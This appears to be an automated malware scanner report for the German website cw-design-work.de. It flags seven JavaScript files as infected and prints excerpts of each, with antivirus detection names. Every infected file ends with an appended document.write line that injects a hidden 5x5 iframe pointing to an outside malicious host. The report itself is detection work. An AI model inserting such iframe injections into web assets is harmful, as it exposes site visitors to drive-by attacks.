New scan:

Malware Scanner report for cw-design-work.de

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/7/7
7 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.cw-design-work.de/
200 OK
Content-Length: 153487
Content-Type: text/html
clean
http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/mootools/mootools-release-1.11.js
200 OK
Content-Length: 65055
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var MooTools={version:"1.11"};function $defined(a){return(a!=undefined)}function $type(b){if(!$defined(b)){return false}if(b.htmlElement){return"element"}var a=typeof b;if(a=="object"&&b.nodeName){switch(b.nodeType){case 1:return"element";case 3:return(/\S/).test(b.nodeValue)?"textnode":"whitespace"}}if(a=="object"||a=="function"){switch(b.constructor){case Array:return"array";case RegExp:return"regexp";case Class:return"class"}if(typeof b.length=="number"){if(b.item){return"collection"}
... 64853 bytes are skipped ...
[d]={};var c=(d!=a)||(this.options.alwaysHide&&(f.offsetHeight>0));this.fireEvent(c?"onBackground":"onActive",[this.togglers[d],f]);for(var g in this.effects){b[d][g]=c?0:f[this.effects[g]]}},this);return this.start(b)},showThisHideOpen:function(a){return this.display(a)}});Fx.Accordion=Accordion;
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
Comodo
TrojWare.JS.Iframe.IN
Microsoft
Trojan:JS/IframeRef.J
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN
GData
HTML:Iframe-inf
Commtouch
IFrame.gen

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/javascript
clean
http://www.cw-design-work.de/plugins/content/denvideo/swfobject.js
200 OK
Content-Length: 6879
Content-Type: application/javascript
clean
http://www.cw-design-work.de/plugins/content/yoo_gallery/lib/lightbox/slimbox_packed.js
200 OK
Content-Length: 4390
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Slimbox;(function(){var G={},H=0,F,M,B,T,U,P,c,E,N,K=new Image(),L=new Image(),Y,b,Q,I,X,a,J,Z,C;window.addEvent("domready",function(){c=W.bindWithEvent();$(document.body).adopt($$([Y=new Element("div",{id:"lbOverlay"}),b=new Element("div",{id:"lbCenter"}),a=new Element("div",{id:"lbBottomContainer"})]).setStyle("display","none"));Q=new Element("div",{id:"lbImage"}).injectInside(b).adopt(I=new Element("a",{id:"lbPrevLink",href:"#"}),X=new Element("a",{id:"lbNextLink",href:"#"}));I.onclick=D;
... 3280 bytes are skipped ...
/> var links = $$("a").filter(function(el) {
return el.rel && el.rel.test(/^lightbox/i);
});
$$(links).slimbox({}, null, function(el) {
return (this == el) || ((this.rel.length > 8) && (this.rel == el.rel));
});
};
window.addEvent("domready", Slimbox.scanPage);document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/base.js
200 OK
Content-Length: 1881
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 15={16:6(y,k){3 8=0;$$(y).n(6(4,i){3 7;9(4.K){7=4.K}O 9(4.h.J){7=4.h.J}8=A.8(8,7)});9(k!=14){8=A.8(8,k)}$$(y).n(6(4,i){3 I=4.m(\'E-z\').j()+4.m(\'E-F\').j()+4.m(\
... 870 bytes are skipped ...
|else|length|false|wait|transition|implement|leave|YOOMorph|Class|initialize|window|ie6|timer|effects|periodical|document|undefined|YOOBase|matchHeight|Element|color|background|FFFFFF|Styles|linear|9000|chk|hasClass|mouseleave|mouseenter|setStyle|getElementsBySelector|px|999999|500|expoOut'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/accordionmenu.js
200 OK
Content-Length: 1507
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 x=7 E({F:4(j,n,3){0.J({r:\'p\',K:4(2){2.m(\'5\');2.g().m(\'5\')},H:4(2){2.l(\'5\');2.g().l(\'5\')}},3);0.8=j;0.b=n;A(0.3.r){B\'C\':0.q();D;p:0.s()}},s:4(){6 3={};
... 490 bytes are skipped ...
ide|accordion|createDefault|defined|ul|bind|toggleClass|YOOAccordionMenu|hasClass|chain|switch|case|slide|break|Class|initialize|implement|onBackground|toggle|setOptions|onActive|addEvent|250|all|duration|linear|Transitions|click|extend|Options|transition|hide|accordionMenu|Accordion|Slide'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/fancymenu.js
200 OK
Content-Length: 2590
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('j Y=e U({1p:8(d,7){4.J({1u:1n.1l.1q,K:1f,1g:F,16:U.1i,f:1,g:\'D\',10:1e,V:\'6.1d\',T:\'6.Z\'},7);4.d=$(d),4.b=4.d.S(4.7.T);4.6=[];4.a=[];4.d.19(4.7.V).1c(8(5,i){4.N
... 1573 bytes are skipped ...
r|mouseleave|effects|YOOFancyMenu|active|slideOffset|switch|mouseenterItem|fade|return|slide|onClick|true|clickItem|getElements|visibility|visible|each|level1|30|500|wait|injectInside|empty|click|mouseenter|Transitions|Event|Fx|bg|initialize|sineInOut|implement|Options|setStyles|transition'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/addons/dropdownmenu.js
200 OK
Content-Length: 2596
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 11=c 1m({1l:2(6,7){1.1k({A:\'1j\',K:\'W\',J:\'1n\',1o:1r,L:1q,s:\'e\',1p:l.1i.1s,1f:1a},7);5 8=1;1.d=$(6);1.w=1d;1.y=[];1.e=[];1.d.H({I:2(){8.e=[];8.x(10)},M:2(){
... 1587 bytes are skipped ...
|null|addClass|wait|implement|slide|Transitions|default|setOptions|initialize|Class|ul|duration|transition|800|600|linear|hasClass|level2|getParent|switch|box4|injectInside|extend|delay|adopt|matchHeight|getChildren|Math|max|fireEvent|opera|window|Options|hasChild|Element|removeClass|clear'.split('|'),0,{}))
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

AntiVir
HTML/IFrame.Inf.9552
Avast
HTML:Iframe-inf
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.HSZ
Comodo
TrojWare.JS.Iframe.IN
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
MicroWorld-eScan
Trojan.JS.Agent.HSZ
Fortinet
JS/Redir.BBEP!tr
NANO-Antivirus
Trojan.Url.IframeB.bgynby
F-Secure
Trojan.JS.Agent.HSZ
F-Prot
IFrame.gen
Norman
IframeRef.DJ
Sophos
Troj/JSRedir-IY
GData
Trojan.JS.Agent.HSZ
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.HSZ

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/templates/yoo_phoenix/lib/js/template.js
200 OK
Content-Length: 3333
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var YOOTemplate = {

start: function() {


YOOTemplate.setDivHeight();


new YOOAccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' });


var dropdown = new YOODropdownMenu('menu', { mode: 'slide', dropdownSelector: 'div.dropdown', transition: Fx.Transitions.Expo.easeOut });
dropdown.matchHeight();


var hoverColor;
switch (YtSettings.color) {
case 'combs
... 2295 bytes are skipped ...
pbox div.deepest', 20);
YOOBase.matchHeight('div.mainbottombox div.deepest', 20);
YOOBase.matchHeight('div.contenttopbox div.deepest', 20);
YOOBase.matchHeight('div.contentbottombox div.deepest', 20);
}

};


window.addEvent('domready', YOOTemplate.start);
;document.write('<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/iFrame.ixk
Avast
HTML:Iframe-BLP [Trj]
Ad-Aware
Trojan.JS.Agent.IXK
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Agent.IXK
TrendMicro-HouseCall
TROJ_GEN.F47V0425
Emsisoft
Trojan.JS.Agent.IXK (B)
Comodo
TrojWare.JS.iFrame.IXK
Microsoft
Trojan:JS/IframeRef.J
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Agent.IXK
NANO-Antivirus
Trojan.Url.IframeB.bstlxn
F-Secure
Trojan.JS.Agent.IXK
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN
GData
Trojan.JS.Agent.IXK
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Agent.IXK

Hidden iFrame found.
size: 5x5     
src: http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8

<iframe src="http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">

http://www.cw-design-work.de/modules/mod_yoo_scroller/mod_yoo_scroller.js
200 OK
Content-Length: 3872
Content-Type: application/javascript
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=56&Itemid=53
200 OK
Content-Length: 255034
Content-Type: text/html
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=46&Itemid=54
200 OK
Content-Length: 150147
Content-Type: text/html
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=47&Itemid=55
200 OK
Content-Length: 213227
Content-Type: text/html
clean
http://www.cw-design-work.de/index.php?option=com_content&view=article&id=49&Itemid=56
200 OK
Content-Length: 146728
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cw-design-work.de

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: cw-design-work.de
Referer: http://www.google.com/search?q=cw-design-work.de

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cw-design-work.de

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cw-design-work.de/

Result: cw-design-work.de is not infected or malware details are not published yet.